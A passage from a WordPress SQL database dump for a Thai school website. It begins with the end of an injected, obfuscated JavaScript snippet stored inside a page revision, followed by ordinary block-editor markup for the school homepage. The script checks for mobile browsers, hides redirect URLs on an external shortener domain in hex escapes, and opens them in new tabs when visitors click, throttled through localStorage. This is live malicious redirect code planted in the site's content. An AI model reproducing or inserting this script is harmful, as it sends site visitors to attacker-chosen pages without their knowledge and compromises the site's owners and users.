_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ช่องการร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','484-revision-v1','','','2024-08-02 11:55:17','2024-08-02 04:55:17','',484,'http://pakhaeng.ssk.in.th/?p=492',0,'revision','',0),
(494,1,'2024-08-02 11:55:54','2024-08-02 04:55:54','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=337\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 